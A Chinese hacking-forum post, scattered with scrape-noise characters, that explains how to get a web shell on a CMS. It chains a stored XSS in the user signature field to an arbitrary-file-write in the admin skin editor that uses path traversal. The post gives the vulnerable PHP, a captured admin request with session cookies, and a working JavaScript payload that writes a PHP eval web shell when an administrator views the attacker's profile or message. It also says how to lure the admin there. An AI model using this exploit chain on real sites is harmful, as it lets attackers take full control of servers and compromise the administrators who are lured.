|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题0 `6 ~; _0 C5 }4 r2 G
官网已经修补了,所以重新下了源码
& U2 D: N/ t. L0 Q- |7 |因为 后台登入 还需要认证码 所以 注入就没看了。
5 N4 D7 o% [; r. B) h存在 xss: W6 H8 h A6 q
漏洞文件 user/member/skin_edit.php" @9 F1 _0 |' n9 P- l( ^
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
" @4 P8 D1 ?5 z, k
/ { j- ?. k5 a</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
% S: }. [9 B' Q0 e
4 T5 D$ S3 _' `! E9 C' ~8 [</textarea></td></tr>
- y% j" ?2 P9 d) F % s/ U; K& ^2 h" Q0 c6 {
user/do.php
% c7 f3 t0 [5 H: U2 _9 H* }! a, m- b$ ~' o( d1 N3 @; l
! A: A" M7 m" K4 U0 ]- c3 b) @if($op=='zl'){ //资料
- `: F0 N3 S T; I1 p! B # e" I1 ?7 l. T; Z
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
& ]% m, a$ ~, e6 S) K exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
9 G- p9 X9 a. S/ j( I # B' q: q# q3 p, y+ I4 C5 b
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 f% C: R7 Z! v, d/ k8 D2 v+ k
; `. n2 \% h; L: `; w0 X CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
1 H5 W; S% C$ ]! ~/ D9 @* k* r where CS_Name='".$cscms_name."'";& U @ O- H! X; p
" {6 v7 L" d2 N: e+ ~. x0 ` if($db->query($sql)){- D- U6 t: X2 e' d7 ^
& _$ ]( n. y' j
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
8 q w8 Q7 M" e6 [$ X ]' ^4 z5 N : G$ i8 i8 d U: @6 `8 W
}else{
3 F# u) p6 w% ^$ N8 l f5 g
d) p, Q. S& N2 x exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));0 U0 X6 V# q% a. k8 Q, q$ g3 E
1 x3 t, c, {! u2 j& z; T }6 b5 j J: ?+ S! l* d% _9 w ~
, Z* i: ~( J, Y1 z# J* Z
& K6 j+ s, {) A6 H没有 过滤导致xss产生。
: [# A( K& b3 G/ z8 g: f后台 看了下 很奇葩的是可以写任意格式文件。。) s9 [2 i/ Y2 d: O
抓包。。
9 ^6 {* H: }* ~* | t1 J
' V; j1 T4 g) I; z3 g" u' q, f i/ G+ P! |9 _5 q
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1, i$ X7 T- V* d
) r3 {; ` X2 fAccept: text/html, application/xhtml+xml, */*
. Q2 }' t# l y4 i( C' |3 N
+ B( \& `- @3 p2 j1 z% G1 U) cReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php6 R0 P: e) ?" p* k
* m- ~6 }, w1 _: n+ e( {! cAccept-Language: zh-CN
- U/ R& ?; v* S, S
% H& r6 W1 {: C3 w) z( sUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
3 h% r3 Q9 }" T5 I, K0 k # s" p9 C4 N0 |! Q0 O$ \
Content-Type: application/x-www-form-urlencoded5 F& p# R4 y' M$ _ q
: ]& {* |5 U* C1 ^7 VAccept-Encoding: gzip, deflate- m' F: M& ^8 F# f1 @: o8 W1 _; P
7 p$ i8 W3 k1 a7 iHost: 127.0.0.1
/ |6 n' I0 f. ~7 D5 W# r
$ R& ^2 U5 M6 O7 q( x- MContent-Length: 38$ c) U% L" r9 a8 C, b
; ^4 F* J1 b K: j; y- d7 K8 P# Z
DNT: 1' K6 o4 P1 q2 T9 j4 H2 X+ w
' a" v/ O0 S! D9 x& @" y/ m( A
Connection: Keep-Alive
6 ~$ i; D9 c% w3 b
f3 U6 h$ w* F" l3 k+ m; p: x% MCache-Control: no-cache, f1 y; C- ]; w3 x" z) w
, ]* e8 p- Q ]/ P& @Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594+ ?2 E& e% @% T; e
& U( h, i' [6 [1 q
( w9 j1 p4 |6 a) s5 k9 t9 y
name=aaa.php&content=%3Cs%3E%3Ca%25%3E6 H/ H& S3 t- P. g0 t
2 y. h2 m5 A4 Q. I' F6 t' C: [3 B6 S' I# W
$ X- U4 E" V5 R7 `+ Z于是 构造js如下。
H8 s9 x7 d1 S5 ?
* D; {( R3 f8 i6 H' Y+ K* N f' a, F本帖隐藏的内容<script> A* V l5 R; V2 E9 I) i6 B4 Z
thisTHost = top.location.hostname;& i$ N- c. `5 {- {5 E
" m! M7 G; S% E( U2 S5 XthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";/ X! l& }- V& ?: y
; I2 G8 i' K8 D1 V+ ^0 \function PostSubmit(url, data, msg) {
" i) c. n7 Y/ G/ h% Y var postUrl = url;
& Z/ ~# D5 V- c' `3 D * C s( J0 g; M: X& F( B- c# n
var postData = data;
, t' e, ~8 ]+ b2 {9 v) Q var msgData = msg; + n1 L3 s# _- p- b( p0 _
var ExportForm = document.createElement("FORM"); ! @% u; O4 R0 P7 o
document.body.appendChild(ExportForm);
0 ^- c' f& B5 Y$ K; l/ R- I ExportForm.method = "POST";
! F2 `7 {. y/ A' Y9 U var newElement = document.createElement("input"); + N& P) f5 F# \' K- H1 g& u
newElement.setAttribute("name", "name");
2 z' G# y# v5 Q; O9 l4 q! r newElement.setAttribute("type", "hidden");
, e0 B' M8 W. G var newElement2 = document.createElement("input"); ' ?( ^5 ~0 a! R9 a6 f1 H
newElement2.setAttribute("name", "content");
! T8 G4 A' T, Y: l9 Y" V$ {8 D7 W newElement2.setAttribute("type", "hidden"); 4 y j$ t: w8 x# s9 `, b
ExportForm.appendChild(newElement); * b/ f( X& R6 s" n- w. F6 d6 Q5 s0 h1 `
ExportForm.appendChild(newElement2);
( V6 s/ y* l: A4 ~5 F& Y newElement.value = postData;
3 h( x! X( L$ M# g0 h) | newElement2.value = msgData;
; M' ?& W" K8 Q/ }' U' } ExportForm.action = postUrl;
; y. @5 r" D7 Z- j ExportForm.submit();
( {: P" D0 ^; q9 b$ K' o' Y1 ?};$ K7 f l- Y+ j, u
( [4 A+ l, E' O- H. W* V2 FPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");- b6 ~6 T5 q6 `& }. _4 s
7 \4 J; F9 u1 a+ W$ l: ~
</script>" k# @) T0 Y/ w6 _# {
8 U4 y# W- f9 E0 w) S$ n8 l
9 }: |( s, d" y4 x0 @6 [9 W& b% k" {+ t, y0 O
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
* u" S1 E' j1 r1 H$ Z- k( c/ Q2 Y用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
5 G5 j! N* W$ Y0 H就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
5 z- j$ }8 o O+ d' B3 Y
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对